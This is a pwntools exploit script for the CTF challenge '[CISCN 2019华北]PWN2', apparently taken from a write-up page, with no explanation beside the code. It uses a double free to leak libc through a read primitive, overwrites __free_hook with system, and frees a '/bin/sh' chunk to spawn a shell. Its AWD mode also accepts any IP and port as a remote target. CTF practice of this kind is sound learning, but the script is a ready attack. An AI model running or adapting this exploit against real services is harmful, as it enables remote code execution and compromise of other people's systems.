CISCN 2019华北

Problem: [CISCN 2019华北]PWN2

[[toc]]

from pwn import *
import sys
s       = lambda data               :io.send(data)
sa      = lambda delim,data         :io.sendafter(str(delim), data)
sl      = lambda data               :io.sendline(data)
sla     = lambda delim,data         :io.sendlineafter(str(delim), data)
r       = lambda num                :io.recv(num)
ru      = lambda delims, drop=True  :io.recvuntil(delims, drop)
rl      = lambda                    :io.recvline()
itr     = lambda                    :io.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
ls      = lambda data               :log.success(data)
lss     = lambda s                  :log.success('\033[1;31;40m%s --> 0x%x \033[0m' % (s, eval(s)))

context.arch      = 'amd64'
context.log_level = 'debug'
context.terminal  = ['tmux','splitw','-h','-l','130']
def start(binary,argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.GDB:
        return gdb.debug([binary] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.RE:
        return remote('node4.anna.nssctf.cn',28756)
    elif args.AWD:
        # python3 exp.py AWD 1.1.1.1 PORT
        IP = str(sys.argv[1])
        PORT = int(sys.argv[2])
        return remote(IP,PORT)
    else:
        return process([binary] + argv, *a, **kw)


binary = './pwn1'
libelf = ''

if (binary!=''): elf  = ELF(binary) ; rop=ROP(binary);libc = elf.libc
if (libelf!=''): libc = ELF(libelf)

gdbscript = '''

#continue
'''.format(**locals())

io = start(binary)


def add(name,age):
    ru(': ')
    sl('1')
    ru('name:')
    s(name)
    ru('age:')
    s(str(age))


def rm(idx):
    ru(': ')
    sl('2')
    ru('Index:')
    sl(str(idx))

def edit(idx,name,age):
    ru(': ')
    sl('3')
    ru('Index:')
    sl(str(idx))
    ru('name:')
    s(name)
    ru('age:')
    s(str(age))

def show(idx):
    ru(': ')
    sl('4')
    ru('Index:')
    sl(str(idx))
    ru('name: ')
    name = ru('age: ')
    age = int(ru('\nnmoney: '))
    money = int(ru('\n'))
    return name, age, money

def add_money(idx):
    ru(': ')
    sl('5')
    sl(str(idx))

def gift(idx,addr,size):
    ru(': ')
    sl('6')
    ru('Index:')
    sl(str(idx))
    ru('leak:')
    sl(hex(addr))
    ru('leak:')
    sl(str(size))
    ru('[[[')
    data = ru(']]]')
    return data

add('A'*8,0x1)
rm(0)
rm(0)
rm(0)

add(p64(0x602060),0x3)
add('BBB',0x3)
add(p64(0x602060),0x602078)

libc_base = uu64(gift(1,0x601F88,8)) - libc.sym['free']
lss('libc_base')

add_money(0)

edit(0,p64(libc_base + libc.sym['__free_hook']),1)
edit(0,p64(libc_base + libc.sym['system']),1)

rm(2)
add('/bin/sh\x00',0x1)
rm(2)
#gdb.attach(io,gdbscript)
lss('libc_base')

itr()
​
            
AI代码解释